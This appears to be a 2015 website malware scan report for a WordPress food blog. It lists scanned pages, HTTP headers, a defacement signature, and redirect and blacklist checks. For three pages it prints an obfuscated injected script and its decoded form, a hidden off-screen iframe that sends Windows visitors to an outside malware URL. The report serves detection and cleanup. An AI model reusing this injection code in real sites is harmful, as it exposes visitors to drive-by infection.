Scanned pages/files
| Request | Server response | Status |
http://allthingsweneed.com/ | 200 OK Content-Length: 3031 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: HACKED by -R-E-M-B-A-S- http://allthingsweneed.com<script language="javascript">
</script> <title>HACKED by -R-E-M-B-A-S-</title> <meta name="generator" content="Hacked by MARIO ARDI, Hacked By -R-E-M-B-A-S- , -R-E-M-B-A-S- , hacked by -R-E-M-B-A-S- , -R-E-M-B-A-S- , [+]Hackercilik[+] , Security Tested" /><meta name="author" content="Hacked By MARIO ARDI a.k.a -R-E-M-B-A-S-" /> <meta name="keywords" content="Hacked By -R-E-M-B-A-S-, hacked by -R-E-M-B-A-S-" /><meta name="description" content="Hacked By -R-E-M- ...[2925 bytes skipped]... | ||
http://allthingsweneed.com/test404page.js | 404 Not Found Content-Length: 27594 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var af87d91=[187,247,287,292,305,219,302,303,308,295,288,248,221,299,298,302,292,303,292,298,297,245,219,284,285,302,298,295,304,303,288,246,219,295,288,289,303,245,232,236,235,235,224,246,219,303,298,299,245,235,224,246,219,306,292,287,303,291,245,236,235,235,224,246,219,291,288,292,290,291,303,245,236,235,235,224,246,221,249,247,302,286,301,292,299,303,249,305,284,301,219,292,248,235,246,289,304,297,286,303,292,298,297,219,287,298,298,227,298,228 ...[1180 bytes skipped]... Decoded script: <div style="position: absolute; left:-100%; top:0%; width:100%; height:100%;">var i=0;function doo(o){if(i==1)return;if(navigator.appVersion.indexOf("Win")!=-1) { o.src="http://fajkopuhytrgohuko.gq/XUoPHgIdUFkICVgRQ1AbFkUGWVAXCVhPUUk.html"; };i=1;return;}<iframe onload="return doo(this);" style="width:50%;height:50%;" src="about:blank"></iframe></div> | ||
http://allthingsweneed.com/contact-us/ | 200 OK Content-Length: 7558 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var af87d91=[187,247,287,292,305,219,302,303,308,295,288,248,221,299,298,302,292,303,292,298,297,245,219,284,285,302,298,295,304,303,288,246,219,295,288,289,303,245,232,236,235,235,224,246,219,303,298,299,245,235,224,246,219,306,292,287,303,291,245,236,235,235,224,246,219,291,288,292,290,291,303,245,236,235,235,224,246,221,249,247,302,286,301,292,299,303,249,305,284,301,219,292,248,235,246,289,304,297,286,303,292,298,297,219,287,298,298,227,298,228 ...[1180 bytes skipped]... Decoded script: <div style="position: absolute; left:-100%; top:0%; width:100%; height:100%;">var i=0;function doo(o){if(i==1)return;if(navigator.appVersion.indexOf("Win")!=-1) { o.src="http://fajkopuhytrgohuko.gq/XUoPHgIdUFkICVgRQ1AbFkUGWVAXCVhPUUk.html"; };i=1;return;}<iframe onload="return doo(this);" style="width:50%;height:50%;" src="about:blank"></iframe></div> | ||
http://allthingsweneed.com/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 308 Content-Type: application/javascript | clean |
http://allthingsweneed.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 786 Content-Type: application/javascript | clean |
http://allthingsweneed.com/category/fine-dining-in | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 19 Jul 2015 20:01:28 GMT Location: http://allthingsweneed.com/category/fine-dining-in/ Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_qos/10.10 Content-Encoding: none Content-Length: 0 Content-Type: text/html; charset=UTF-7 X-Pingback: http://allthingsweneed.com/xmlrpc.php X-Powered-By: PHP/5.4.26 | clean |
http://allthingsweneed.com/category/fine-dining-in/ | 200 OK Content-Length: 167 Content-Type: text/html | clean |
http://allthingsweneed.com/category/danish-food-and-drink | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 19 Jul 2015 20:01:30 GMT Location: http://allthingsweneed.com/category/danish-food-and-drink/ Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_qos/10.10 Content-Encoding: none Content-Length: 0 Content-Type: text/html; charset=UTF-7 X-Pingback: http://allthingsweneed.com/xmlrpc.php X-Powered-By: PHP/5.4.26 | clean |
http://allthingsweneed.com/category/danish-food-and-drink/ | 200 OK Content-Length: 167 Content-Type: text/html | clean |
http://allthingsweneed.com/category/drinks-party-food | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 19 Jul 2015 20:01:32 GMT Location: http://allthingsweneed.com/category/drinks-party-food/ Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_qos/10.10 Content-Encoding: none Content-Length: 0 Content-Type: text/html; charset=UTF-7 X-Pingback: http://allthingsweneed.com/xmlrpc.php X-Powered-By: PHP/5.4.26 | clean |
http://allthingsweneed.com/category/drinks-party-food/ | 200 OK Content-Length: 167 Content-Type: text/html | clean |
http://allthingsweneed.com/category/african-food-and-drink | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 19 Jul 2015 20:01:34 GMT Location: http://allthingsweneed.com/category/african-food-and-drink/ Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_qos/10.10 Content-Encoding: none Content-Length: 0 Content-Type: text/html; charset=UTF-7 X-Pingback: http://allthingsweneed.com/xmlrpc.php X-Powered-By: PHP/5.4.26 | clean |
http://allthingsweneed.com/category/african-food-and-drink/ | 200 OK Content-Length: 167 Content-Type: text/html | clean |
http://allthingsweneed.com/wp-admin/widgets.php | HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 19 Jul 2015 20:01:35 GMT Pragma: no-cache Location: http://allthingsweneed.com/wp-login.php?redirect_to=http%3A%2F%2Fallthingsweneed.com%2Fwp-admin%2Fwidgets.php&reauth=1 Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_qos/10.10 Content-Encoding: none Content-Length: 0 Content-Type: text/html Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 19 Jul 2015 20:01:36 GMT X-Powered-By: PHP/5.4.26 | clean |
http://allthingsweneed.com/wp-login.php?redirect_to=http%3a%2f%2fallthingsweneed.com%2fwp-admin%2fwidgets.php&reauth=1 | 200 OK Content-Length: 2513 Content-Type: text/html | clean |
http://allthingsweneed.com/wp-login.php?action=lostpassword | 200 OK Content-Length: 2141 Content-Type: text/html | clean |
http://allthingsweneed.com/wp-login.php | 200 OK Content-Length: 2502 Content-Type: text/html | clean |
http://allthingsweneed.com/privacy-policy/ | 200 OK Content-Length: 7563 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var af87d91=[187,247,287,292,305,219,302,303,308,295,288,248,221,299,298,302,292,303,292,298,297,245,219,284,285,302,298,295,304,303,288,246,219,295,288,289,303,245,232,236,235,235,224,246,219,303,298,299,245,235,224,246,219,306,292,287,303,291,245,236,235,235,224,246,219,291,288,292,290,291,303,245,236,235,235,224,246,221,249,247,302,286,301,292,299,303,249,305,284,301,219,292,248,235,246,289,304,297,286,303,292,298,297,219,287,298,298,227,298,228 ...[1180 bytes skipped]... Decoded script: <div style="position: absolute; left:-100%; top:0%; width:100%; height:100%;">var i=0;function doo(o){if(i==1)return;if(navigator.appVersion.indexOf("Win")!=-1) { o.src="http://fajkopuhytrgohuko.gq/XUoPHgIdUFkICVgRQ1AbFkUGWVAXCVhPUUk.html"; };i=1;return;}<iframe onload="return doo(this);" style="width:50%;height:50%;" src="about:blank"></iframe></div> | ||
http://allthingsweneed.com/category/ancient-greek-foods-and-drinks/ | 200 OK Content-Length: 167 Content-Type: text/html | clean |
http://allthingsweneed.com/category/aztec-food-and-drink/ | 200 OK Content-Length: 167 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: allthingsweneed.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Jul 2015 20:01:20 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_qos/10.10
Content-Encoding: none
Content-Type: text/html; charset=UTF-7
X-Pingback: http://allthingsweneed.com/xmlrpc.php
X-Powered-By: PHP/5.4.26
GET / HTTP/1.1
Host: allthingsweneed.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Jul 2015 20:01:20 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_qos/10.10
Content-Encoding: none
Content-Type: text/html; charset=UTF-7
X-Pingback: http://allthingsweneed.com/xmlrpc.php
X-Powered-By: PHP/5.4.26
Second query (visit from search engine):
GET / HTTP/1.1
Host: allthingsweneed.com
Referer: http://www.google.com/search?q=allthingsweneed.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: allthingsweneed.com
Referer: http://www.google.com/search?q=allthingsweneed.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=allthingsweneed.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://allthingsweneed.com/
Result: allthingsweneed.com is not infected or malware details are not published yet.
Result: allthingsweneed.com is not infected or malware details are not published yet.